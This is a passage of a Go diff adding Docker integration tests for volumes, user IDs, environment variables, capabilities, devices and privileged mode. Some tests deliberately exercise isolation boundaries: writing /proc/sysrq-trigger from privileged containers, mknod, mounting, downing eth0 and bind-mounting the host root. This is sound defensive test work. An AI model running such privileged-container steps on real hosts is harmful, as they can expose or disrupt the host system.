+		fileInVol = `c:/test/file`
+	} else {
+		volumeDir = "/test"
+		fileInVol = "/test/file"
+	}
+
+	dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true")
+	dockerCmd(c, "run", "--volumes-from", "parent:rw", "busybox", "touch", fileInVol)
+
+	if out, _, err := dockerCmdWithError("run", "--volumes-from", "parent:bar", "busybox", "touch", fileInVol); err == nil || !strings.Contains(out, `invalid mode: bar`) {
+		c.Fatalf("running --volumes-from parent:bar should have failed with invalid mode: %q", out)
+	}
+
+	dockerCmd(c, "run", "--volumes-from", "parent", "busybox", "touch", fileInVol)
+}
+
+func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	hostpath := randomTmpDirPath("test", daemonPlatform)
+	if err := os.MkdirAll(hostpath, 0755); err != nil {
+		c.Fatalf("Failed to create %s: %q", hostpath, err)
+	}
+	defer os.RemoveAll(hostpath)
+
+	// TODO Windows: Temporary check - remove once TP5 support is dropped
+	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
+		c.Skip("Needs later Windows build for RO volumes")
+	}
+	dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true")
+
+	// Expect this "rw" mode to be be ignored since the inherited volume is "ro"
+	if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent:rw", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil {
+		c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `rw`")
+	}
+
+	dockerCmd(c, "run", "--name", "parent2", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true")
+
+	// Expect this to be read-only since both are "ro"
+	if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent2:ro", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil {
+		c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `ro`")
+	}
+}
+
+// Test for GH#10618
+func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) {
+	path1 := randomTmpDirPath("test1", daemonPlatform)
+	path2 := randomTmpDirPath("test2", daemonPlatform)
+
+	someplace := ":/someplace"
+	if daemonPlatform == "windows" {
+		// Windows requires that the source directory exists before calling HCS
+		testRequires(c, SameHostDaemon)
+		someplace = `:c:\someplace`
+		if err := os.MkdirAll(path1, 0755); err != nil {
+			c.Fatalf("Failed to create %s: %q", path1, err)
+		}
+		defer os.RemoveAll(path1)
+		if err := os.MkdirAll(path2, 0755); err != nil {
+			c.Fatalf("Failed to create %s: %q", path1, err)
+		}
+		defer os.RemoveAll(path2)
+	}
+	mountstr1 := path1 + someplace
+	mountstr2 := path2 + someplace
+
+	if out, _, err := dockerCmdWithError("run", "-v", mountstr1, "-v", mountstr2, "busybox", "true"); err == nil {
+		c.Fatal("Expected error about duplicate mount definitions")
+	} else {
+		if !strings.Contains(out, "Duplicate mount point") {
+			c.Fatalf("Expected 'duplicate mount point' error, got %v", out)
+		}
+	}
+
+	// Test for https://github.com/docker/docker/issues/22093
+	volumename1 := "test1"
+	volumename2 := "test2"
+	volume1 := volumename1 + someplace
+	volume2 := volumename2 + someplace
+	if out, _, err := dockerCmdWithError("run", "-v", volume1, "-v", volume2, "busybox", "true"); err == nil {
+		c.Fatal("Expected error about duplicate mount definitions")
+	} else {
+		if !strings.Contains(out, "Duplicate mount point") {
+			c.Fatalf("Expected 'duplicate mount point' error, got %v", out)
+		}
+	}
+	// create failed should have create volume volumename1 or volumename2
+	// we should remove volumename2 or volumename2 successfully
+	out, _ := dockerCmd(c, "volume", "ls")
+	if strings.Contains(out, volumename1) {
+		dockerCmd(c, "volume", "rm", volumename1)
+	} else {
+		dockerCmd(c, "volume", "rm", volumename2)
+	}
+}
+
+// Test for #1351
+func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) {
+	prefix := ""
+	if daemonPlatform == "windows" {
+		prefix = `c:`
+	}
+	dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo")
+	dockerCmd(c, "run", "--volumes-from", "parent", "-v", prefix+"/test", "busybox", "cat", prefix+"/test/foo")
+}
+
+func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) {
+	prefix := ""
+	if daemonPlatform == "windows" {
+		prefix = `c:`
+	}
+	dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo")
+	dockerCmd(c, "run", "--name", "parent2", "-v", prefix+"/other", "busybox", "touch", prefix+"/other/bar")
+	dockerCmd(c, "run", "--volumes-from", "parent1", "--volumes-from", "parent2", "busybox", "sh", "-c", "cat /test/foo && cat /other/bar")
+}
+
+// this tests verifies the ID format for the container
+func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) {
+	out, exit, err := dockerCmdWithError("run", "-d", "busybox", "true")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if exit != 0 {
+		c.Fatalf("expected exit code 0 received %d", exit)
+	}
+
+	match, err := regexp.MatchString("^[0-9a-f]{64}$", strings.TrimSuffix(out, "\n"))
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !match {
+		c.Fatalf("Invalid container ID: %s", out)
+	}
+}
+
+// Test that creating a container with a volume doesn't crash. Regression test for #995.
+func (s *DockerSuite) TestRunCreateVolume(c *check.C) {
+	prefix := ""
+	if daemonPlatform == "windows" {
+		prefix = `c:`
+	}
+	dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true")
+}
+
+// Test that creating a volume with a symlink in its path works correctly. Test for #5152.
+// Note that this bug happens only with symlinks with a target that starts with '/'.
+func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) {
+	// Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...)
+	testRequires(c, DaemonIsLinux)
+	image := "docker-test-createvolumewithsymlink"
+
+	buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-")
+	buildCmd.Stdin = strings.NewReader(`FROM busybox
+		RUN ln -s home /bar`)
+	buildCmd.Dir = workingDirectory
+	err := buildCmd.Run()
+	if err != nil {
+		c.Fatalf("could not build '%s': %v", image, err)
+	}
+
+	_, exitCode, err := dockerCmdWithError("run", "-v", "/bar/foo", "--name", "test-createvolumewithsymlink", image, "sh", "-c", "mount | grep -q /home/foo")
+	if err != nil || exitCode != 0 {
+		c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode)
+	}
+
+	volPath, err := inspectMountSourceField("test-createvolumewithsymlink", "/bar/foo")
+	c.Assert(err, checker.IsNil)
+
+	_, exitCode, err = dockerCmdWithError("rm", "-v", "test-createvolumewithsymlink")
+	if err != nil || exitCode != 0 {
+		c.Fatalf("[rm] err: %v, exitcode: %d", err, exitCode)
+	}
+
+	_, err = os.Stat(volPath)
+	if !os.IsNotExist(err) {
+		c.Fatalf("[open] (expecting 'file does not exist' error) err: %v, volPath: %s", err, volPath)
+	}
+}
+
+// Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`.
+func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) {
+	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// Windows does not support symlinks inside a volume path
+	testRequires(c, DaemonIsLinux)
+	name := "docker-test-volumesfromsymlinkpath"
+	prefix := ""
+	dfContents := `FROM busybox
+		RUN ln -s home /foo
+		VOLUME ["/foo/bar"]`
+
+	if daemonPlatform == "windows" {
+		prefix = `c:`
+		dfContents = `FROM ` + WindowsBaseImage + `
+	    RUN mkdir c:\home
+		RUN mklink /D c:\foo c:\home
+		VOLUME ["c:/foo/bar"]
+		ENTRYPOINT c:\windows\system32\cmd.exe`
+	}
+
+	buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-")
+	buildCmd.Stdin = strings.NewReader(dfContents)
+	buildCmd.Dir = workingDirectory
+	err := buildCmd.Run()
+	if err != nil {
+		c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err)
+	}
+
+	out, exitCode, err := dockerCmdWithError("run", "--name", "test-volumesfromsymlinkpath", name)
+	if err != nil || exitCode != 0 {
+		c.Fatalf("[run] (volume) err: %v, exitcode: %d, out: %s", err, exitCode, out)
+	}
+
+	_, exitCode, err = dockerCmdWithError("run", "--volumes-from", "test-volumesfromsymlinkpath", "busybox", "sh", "-c", "ls "+prefix+"/foo | grep -q bar")
+	if err != nil || exitCode != 0 {
+		c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode)
+	}
+}
+
+func (s *DockerSuite) TestRunExitCode(c *check.C) {
+	var (
+		exit int
+		err  error
+	)
+
+	_, exit, err = dockerCmdWithError("run", "busybox", "/bin/sh", "-c", "exit 72")
+
+	if err == nil {
+		c.Fatal("should not have a non nil error")
+	}
+	if exit != 72 {
+		c.Fatalf("expected exit code 72 received %d", exit)
+	}
+}
+
+func (s *DockerSuite) TestRunUserDefaults(c *check.C) {
+	expected := "uid=0(root) gid=0(root)"
+	if daemonPlatform == "windows" {
+		expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)"
+	}
+	out, _ := dockerCmd(c, "run", "busybox", "id")
+	if !strings.Contains(out, expected) {
+		c.Fatalf("expected '%s' got %s", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserByName(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-u", "root", "busybox", "id")
+	if !strings.Contains(out, "uid=0(root) gid=0(root)") {
+		c.Fatalf("expected root user got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserByID(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-u", "1", "busybox", "id")
+	if !strings.Contains(out, "uid=1(daemon) gid=1(daemon)") {
+		c.Fatalf("expected daemon user got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserByIDBig(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux, NotArm)
+	out, _, err := dockerCmdWithError("run", "-u", "2147483648", "busybox", "id")
+	if err == nil {
+		c.Fatal("No error, but must be.", out)
+	}
+	if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) {
+		c.Fatalf("expected error about uids range, got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "-u", "-1", "busybox", "id")
+	if err == nil {
+		c.Fatal("No error, but must be.", out)
+	}
+	if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) {
+		c.Fatalf("expected error about uids range, got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserByIDZero(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "-u", "0", "busybox", "id")
+	if err != nil {
+		c.Fatal(err, out)
+	}
+	if !strings.Contains(out, "uid=0(root) gid=0(root) groups=10(wheel)") {
+		c.Fatalf("expected daemon user got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunUserNotFound(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as Windows does
+	// not support the use of -u
+	testRequires(c, DaemonIsLinux)
+	_, _, err := dockerCmdWithError("run", "-u", "notme", "busybox", "id")
+	if err == nil {
+		c.Fatal("unknown user should cause container to fail")
+	}
+}
+
+func (s *DockerSuite) TestRunTwoConcurrentContainers(c *check.C) {
+	sleepTime := "2"
+	group := sync.WaitGroup{}
+	group.Add(2)
+
+	errChan := make(chan error, 2)
+	for i := 0; i < 2; i++ {
+		go func() {
+			defer group.Done()
+			_, _, err := dockerCmdWithError("run", "busybox", "sleep", sleepTime)
+			errChan <- err
+		}()
+	}
+
+	group.Wait()
+	close(errChan)
+
+	for err := range errChan {
+		c.Assert(err, check.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestRunEnvironment(c *check.C) {
+	// TODO Windows: Environment handling is different between Linux and
+	// Windows and this test relies currently on unix functionality.
+	testRequires(c, DaemonIsLinux)
+	cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env")
+	cmd.Env = append(os.Environ(),
+		"TRUE=false",
+		"TRICKY=tri\ncky\n",
+	)
+
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+
+	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	sort.Strings(actualEnv)
+
+	goodEnv := []string{
+		"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+		"HOSTNAME=testing",
+		"FALSE=true",
+		"TRUE=false",
+		"TRICKY=tri",
+		"cky",
+		"",
+		"HOME=/root",
+	}
+	sort.Strings(goodEnv)
+	if len(goodEnv) != len(actualEnv) {
+		c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", "))
+	}
+	for i := range goodEnv {
+		if actualEnv[i] != goodEnv[i] {
+			c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i])
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) {
+	// TODO Windows: Environment handling is different between Linux and
+	// Windows and this test relies currently on unix functionality.
+	testRequires(c, DaemonIsLinux)
+
+	// Test to make sure that when we use -e on env vars that are
+	// not set in our local env that they're removed (if present) in
+	// the container
+
+	cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env")
+	cmd.Env = appendBaseEnv(true)
+
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+
+	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	sort.Strings(actualEnv)
+
+	goodEnv := []string{
+		"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+		"HOME=/root",
+	}
+	sort.Strings(goodEnv)
+	if len(goodEnv) != len(actualEnv) {
+		c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", "))
+	}
+	for i := range goodEnv {
+		if actualEnv[i] != goodEnv[i] {
+			c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i])
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) {
+	// TODO Windows: Environment handling is different between Linux and
+	// Windows and this test relies currently on unix functionality.
+	testRequires(c, DaemonIsLinux)
+
+	// Test to make sure that when we use -e on env vars that are
+	// already in the env that we're overriding them
+
+	cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env")
+	cmd.Env = appendBaseEnv(true, "HOSTNAME=bar")
+
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+
+	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	sort.Strings(actualEnv)
+
+	goodEnv := []string{
+		"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+		"HOME=/root2",
+		"HOSTNAME=bar",
+	}
+	sort.Strings(goodEnv)
+	if len(goodEnv) != len(actualEnv) {
+		c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", "))
+	}
+	for i := range goodEnv {
+		if actualEnv[i] != goodEnv[i] {
+			c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i])
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunContainerNetwork(c *check.C) {
+	if daemonPlatform == "windows" {
+		// Windows busybox does not have ping. Use built in ping instead.
+		dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1")
+	} else {
+		dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1")
+	}
+}
+
+func (s *DockerSuite) TestRunNetHostNotAllowedWithLinks(c *check.C) {
+	// TODO Windows: This is Linux specific as --link is not supported and
+	// this will be deprecated in favor of container networking model.
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "run", "--name", "linked", "busybox", "true")
+
+	_, _, err := dockerCmdWithError("run", "--net=host", "--link", "linked:linked", "busybox", "true")
+	if err == nil {
+		c.Fatal("Expected error")
+	}
+}
+
+// #7851 hostname outside container shows FQDN, inside only shortname
+// For testing purposes it is not required to set host's hostname directly
+// and use "--net=host" (as the original issue submitter did), as the same
+// codepath is executed with "docker run -h <hostname>".  Both were manually
+// tested, but this testcase takes the simpler path of using "run -h .."
+func (s *DockerSuite) TestRunFullHostnameSet(c *check.C) {
+	// TODO Windows: -h is not yet functional.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-h", "foo.bar.baz", "busybox", "hostname")
+	if actual := strings.Trim(out, "\r\n"); actual != "foo.bar.baz" {
+		c.Fatalf("expected hostname 'foo.bar.baz', received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunPrivilegedCanMknod(c *check.C) {
+	// Not applicable for Windows as Windows daemon does not support
+	// the concept of --privileged, and mknod is a Unix concept.
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunUnprivilegedCanMknod(c *check.C) {
+	// Not applicable for Windows as Windows daemon does not support
+	// the concept of --privileged, and mknod is a Unix concept.
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapDropInvalid(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-drop
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-drop=CHPASS", "busybox", "ls")
+	if err == nil {
+		c.Fatal(err, out)
+	}
+}
+
+func (s *DockerSuite) TestRunCapDropCannotMknod(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-drop or mknod
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-drop=MKNOD", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+
+	if err == nil {
+		c.Fatal(err, out)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual == "ok" {
+		c.Fatalf("expected output not ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapDropCannotMknodLowerCase(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-drop or mknod
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-drop=mknod", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+
+	if err == nil {
+		c.Fatal(err, out)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual == "ok" {
+		c.Fatalf("expected output not ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapDropALLCannotMknod(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-drop or mknod
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-drop=ALL", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+	if err == nil {
+		c.Fatal(err, out)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual == "ok" {
+		c.Fatalf("expected output not ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapDropALLAddMknodCanMknod(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-drop or mknod
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=MKNOD", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddInvalid(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-add
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-add=CHPASS", "busybox", "ls")
+	if err == nil {
+		c.Fatal(err, out)
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddCanDownInterface(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-add
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--cap-add=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddALLCanDownInterface(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-add
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--cap-add=ALL", "busybox", "sh", "-c", "ip link set eth0 down && echo ok")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddALLDropNetAdminCanDownInterface(c *check.C) {
+	// Not applicable for Windows as there is no concept of --cap-add
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cap-add=ALL", "--cap-drop=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok")
+	if err == nil {
+		c.Fatal(err, out)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual == "ok" {
+		c.Fatalf("expected output not ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunGroupAdd(c *check.C) {
+	// Not applicable for Windows as there is no concept of --group-add
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--group-add=audio", "--group-add=staff", "--group-add=777", "busybox", "sh", "-c", "id")
+
+	groupsList := "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777"
+	if actual := strings.Trim(out, "\r\n"); actual != groupsList {
+		c.Fatalf("expected output %s received %s", groupsList, actual)
+	}
+}
+
+func (s *DockerSuite) TestRunPrivilegedCanMount(c *check.C) {
+	// Not applicable for Windows as there is no concept of --privileged
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunUnprivilegedCannotMount(c *check.C) {
+	// Not applicable for Windows as there is no concept of unprivileged
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok")
+
+	if err == nil {
+		c.Fatal(err, out)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual == "ok" {
+		c.Fatalf("expected output not ok received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunSysNotWritableInNonPrivilegedContainers(c *check.C) {
+	// Not applicable for Windows as there is no concept of unprivileged
+	testRequires(c, DaemonIsLinux, NotArm)
+	if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/sys/kernel/profiling"); err == nil || code == 0 {
+		c.Fatal("sys should not be writable in a non privileged container")
+	}
+}
+
+func (s *DockerSuite) TestRunSysWritableInPrivilegedContainers(c *check.C) {
+	// Not applicable for Windows as there is no concept of unprivileged
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	if _, code, err := dockerCmdWithError("run", "--privileged", "busybox", "touch", "/sys/kernel/profiling"); err != nil || code != 0 {
+		c.Fatalf("sys should be writable in privileged container")
+	}
+}
+
+func (s *DockerSuite) TestRunProcNotWritableInNonPrivilegedContainers(c *check.C) {
+	// Not applicable for Windows as there is no concept of unprivileged
+	testRequires(c, DaemonIsLinux)
+	if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/proc/sysrq-trigger"); err == nil || code == 0 {
+		c.Fatal("proc should not be writable in a non privileged container")
+	}
+}
+
+func (s *DockerSuite) TestRunProcWritableInPrivilegedContainers(c *check.C) {
+	// Not applicable for Windows as there is no concept of --privileged
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	if _, code := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "touch /proc/sysrq-trigger"); code != 0 {
+		c.Fatalf("proc should be writable in privileged container")
+	}
+}
+
+func (s *DockerSuite) TestRunDeviceNumbers(c *check.C) {
+	// Not applicable on Windows as /dev/ is a Unix specific concept
+	// TODO: NotUserNamespace could be removed here if "root" "root" is replaced w user
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "ls -l /dev/null")
+	deviceLineFields := strings.Fields(out)
+	deviceLineFields[6] = ""
+	deviceLineFields[7] = ""
+	deviceLineFields[8] = ""
+	expected := []string{"crw-rw-rw-", "1", "root", "root", "1,", "3", "", "", "", "/dev/null"}
+
+	if !(reflect.DeepEqual(deviceLineFields, expected)) {
+		c.Fatalf("expected output\ncrw-rw-rw- 1 root root 1, 3 May 24 13:29 /dev/null\n received\n %s\n", out)
+	}
+}
+
+func (s *DockerSuite) TestRunThatCharacterDevicesActLikeCharacterDevices(c *check.C) {
+	// Not applicable on Windows as /dev/ is a Unix specific concept
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "dd if=/dev/zero of=/zero bs=1k count=5 2> /dev/null ; du -h /zero")
+	if actual := strings.Trim(out, "\r\n"); actual[0] == '0' {
+		c.Fatalf("expected a new file called /zero to be create that is greater than 0 bytes long, but du says: %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunUnprivilegedWithChroot(c *check.C) {
+	// Not applicable on Windows as it does not support chroot
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "busybox", "chroot", "/", "true")
+}
+
+func (s *DockerSuite) TestRunAddingOptionalDevices(c *check.C) {
+	// Not applicable on Windows as Windows does not support --device
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--device", "/dev/zero:/dev/nulo", "busybox", "sh", "-c", "ls /dev/nulo")
+	if actual := strings.Trim(out, "\r\n"); actual != "/dev/nulo" {
+		c.Fatalf("expected output /dev/nulo, received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunAddingOptionalDevicesNoSrc(c *check.C) {
+	// Not applicable on Windows as Windows does not support --device
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--device", "/dev/zero:rw", "busybox", "sh", "-c", "ls /dev/zero")
+	if actual := strings.Trim(out, "\r\n"); actual != "/dev/zero" {
+		c.Fatalf("expected output /dev/zero, received %s", actual)
+	}
+}
+
+func (s *DockerSuite) TestRunAddingOptionalDevicesInvalidMode(c *check.C) {
+	// Not applicable on Windows as Windows does not support --device
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	_, _, err := dockerCmdWithError("run", "--device", "/dev/zero:ro", "busybox", "sh", "-c", "ls /dev/zero")
+	if err == nil {
+		c.Fatalf("run container with device mode ro should fail")
+	}
+}
+
+func (s *DockerSuite) TestRunModeHostname(c *check.C) {
+	// Not applicable on Windows as Windows does not support -h
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	out, _ := dockerCmd(c, "run", "-h=testhostname", "busybox", "cat", "/etc/hostname")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "testhostname" {
+		c.Fatalf("expected 'testhostname', but says: %q", actual)
+	}
+
+	out, _ = dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hostname")
+
+	hostname, err := os.Hostname()
+	if err != nil {
+		c.Fatal(err)
+	}
+	if actual := strings.Trim(out, "\r\n"); actual != hostname {
+		c.Fatalf("expected %q, but says: %q", hostname, actual)
+	}
+}
+
+func (s *DockerSuite) TestRunRootWorkdir(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd")
+	expected := "/\n"
+	if daemonPlatform == "windows" {
+		expected = "C:" + expected
+	}
+	if out != expected {
+		c.Fatalf("pwd returned %q (expected %s)", s, expected)
+	}
+}
+
+func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) {
+	if daemonPlatform == "windows" {
+		// Windows busybox will fail with Permission Denied on items such as pagefile.sys
+		dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`)
+	} else {
+		dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host")
+	}
+}
+
+func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) {
+	mount := "/:/"
+	targetDir := "/host"
+	if daemonPlatform == "windows" {
+		mount = `c:\:c\`
+		targetDir = "c:/host" // Forward slash as using busybox
+	}
